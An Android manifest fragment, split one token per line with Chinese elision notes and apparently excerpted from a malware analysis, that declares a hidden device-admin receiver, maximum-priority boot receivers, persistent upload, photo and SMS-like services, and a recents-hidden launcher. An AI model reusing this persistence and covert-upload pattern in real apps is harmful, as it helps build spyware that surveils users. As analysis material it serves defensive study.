<
uses-permission
android:name
=
"android.permission.VIBRATE"
/>
<…一系列监听权限>
<
application
android:allowBackup
=
"true"
android:debuggable
=
"true"
android:icon
=
"@drawable/icon1"
android:label
=
"@string/app_name"
android:name
=
"com.exp.wr.AaApp"
>
<
activity
android:excludeFromRecents
=
"true"
android:label
=
"@string/app_name"
android:name
=
"com.qwe.MainActi"
>
<
intent-filter
>
<
action
android:name
=
"android.intent.action.MAIN"
/>
<
category
android:name
=
"android.intent.category.LAUNCHER"
/>
</
intent-filter
>
</
activity
>
<
activity
android:excludeFromRecents
=
"true"
android:name
=
"com.qwe.Bridg"
android:theme
=
"@android:style/Theme.NoTitleBar.Fullscreen"
>
<
intent-filter
>
<
action
android:name
=
"android.intent.action.MAIN"
/>
</
intent-filter
>
</
activity
>
<
activity
android:name
=
"com.qwe.Act"
android:screenOrientation
=
"portrait"
android:windowSoftInputMode
=
"stateAlwaysVisible"
/>
<
activity
android:name
=
"com.qwe.C_LLL"
android:screenOrientation
=
"portrait"
/>
<
activity
android:name
=
"com.qwe.SB_CCC"
android:screenOrientation
=
"portrait"
android:windowSoftInputMode
=
"stateAlwaysVisible"
/>
<
activity
android:configChanges
=
"keyboardHidden|navigation|orientation"
android:exported
=
"true"
android:name
=
"com.qwe.Secu"
android:screenOrientation
=
"portrait"
/>
<
activity
android:configChanges
=
"keyboardHidden|navigation|orientation"
android:name
=
"com.qwe.TakePhoto"
android:screenOrientation
=
"portrait"
/>
<
activity
android:name
=
"com.qwe.Fi"
android:screenOrientation
=
"portrait"
android:theme
=
"@android:style/Theme.NoTitleBar.Fullscreen"
/>
<
receiver
android:description
=
"@string/app_name"
android:label
=
"@string/app_name"
android:name
=
"com.a.MyAdminReceiver"
android:permission
=
"android.permission.BIND_DEVICE_ADMIN"
>
<
meta-data
android:name
=
"android.app.device_admin"
android:resource
=
"@xml/god"
/>
<
intent-filter
>
<
action
android:name
=
"android.app.action.DEVICE_ADMIN_ENABLED"
/>
</
intent-filter
>
</
receiver
>
<
receiver
android:enabled
=
"true"
android:exported
=
"true"
android:name
=
"com.a.Boo"
>
<
intent-filter
android:priority
=
"2147483647"
>
<
action
android:name
=
"android.intent.action.BOOT_COMPLETED"
/>
<
action
android:name
=
"android.intent.action.ACTION_SHUTDOWN"
/>
<
action
android:name
=
"android.intent.action.USER_PRESENT"
/>
</
intent-filter
>
</
receiver
>
<
receiver
android:name
=
"com.a.A113"
>
<
intent-filter
android:priority
=
"2147483647"
>
<
action
android:name
=
"android.intent.action.BOOT_COMPLETED"
/>
<…一系列监听事件>
<
category
android:name
=
"android.intent.category.HOME"
/>
</
intent-filter
>
</
receiver
>
<
service
android:enabled
=
"true"
android:name
=
"com.qwe.service.AutBan"
android:persistent
=
"true"
>
<
intent-filter
>
<
action
android:name
=
"android.intent.action.BOOT_COMPLETED"
/>
</
intent-filter
>
</
service
>
<
service
android:enabled
=
"true"
android:name
=
"com.qwe.service.SM"
android:persistent
=
"true"
>
<
intent-filter
>
<
action
android:name
=
"android.intent.action.BOOT_COMPLETED"
/>
</
intent-filter
>
</
service
>
<
service
android:enabled
=
"true"
android:name
=
"com.qwe.service.Inte"
android:persistent
=
"true"
>
<
intent-filter
>
<
action
android:name
=
"android.intent.action.BOOT_COMPLETED"
/>
</
intent-filter
>
</
service
>
<
service
android:enabled
=
"true"
android:name
=
"com.qwe.service.InLit"
android:persistent
=
"true"
>
<
intent-filter
>
<
action
android:name
=
"android.intent.action.BOOT_COMPLETED"
/>
</
intent-filter
>
</
service
>
<
service
android:enabled
=
"true"
android:exported
=
"true"
android:name
=
"com.qwe.service.UploadServ"
android:persistent
=
"true"
>
<
intent-filter
>
<
action
android:name
=
"android.intent.action.BOOT_COMPLETED"
/>
</
intent-filter
>
</
service
>
<
service
android:enabled
=
"true"
android:name
=
"com.qwe.service.Heart"
android:persistent
=
"true"
>
<
intent-filter
>
<
action
android:name
=
"android.intent.action.BOOT_COMPLETED"
/>
</
intent-filter
>
</
service
>
</
application
>
</
manifest
>